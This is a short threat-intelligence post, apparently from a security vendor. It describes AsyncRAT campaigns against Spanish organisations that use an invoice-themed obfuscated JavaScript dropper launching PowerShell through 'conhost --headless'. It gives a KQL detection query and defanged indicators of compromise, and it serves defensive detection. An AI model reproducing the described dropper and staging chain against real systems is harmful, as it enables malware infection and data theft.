During the month of March, Alpine's Threat Hunting team has identified several malicious campaigns against Spanish organizations with the aim of infecting them with the open-source RAT AsyncRAT. This RAT, launched in 2019 and commonly used by various Threat-Actors, has capabilities to execute all kinds of offensive actions on the compromised computer: Keylogging, screen recorder, exfil, etc.
In the TTPs observed, the threat actor send an obfuscated .js to the victims under the pretext of being an invoice.
The javascript, executed via WScript, serves as a Dropper To download the following stage making use of PowerShell using the Lolbin "conhost–headless".
An effective defense to identify the stagging phase employed in this type of campaign is to monitor the combination of conhost and the –headless argument. See, for example, the following KQL query.
DeviceProcessEvents
| where ProcessCommandLine contains "conhost" andProcessCommandLine contains "--headless" and ProcessCommandLinecontains "powershell"
| project Timestamp,ActionType,FileName,ProcessCommandLine 
IOC:
- fuau4z3a[.]top
- mints1fuau4z3a[.]top
- http://eventoscasacordillera[.]Cl
- Script:_Factura_01981865434_PDF.js
- SHA1:7ca093a76131ad56bf11a520a512c2d1cfd222fd
share this post
subscribe
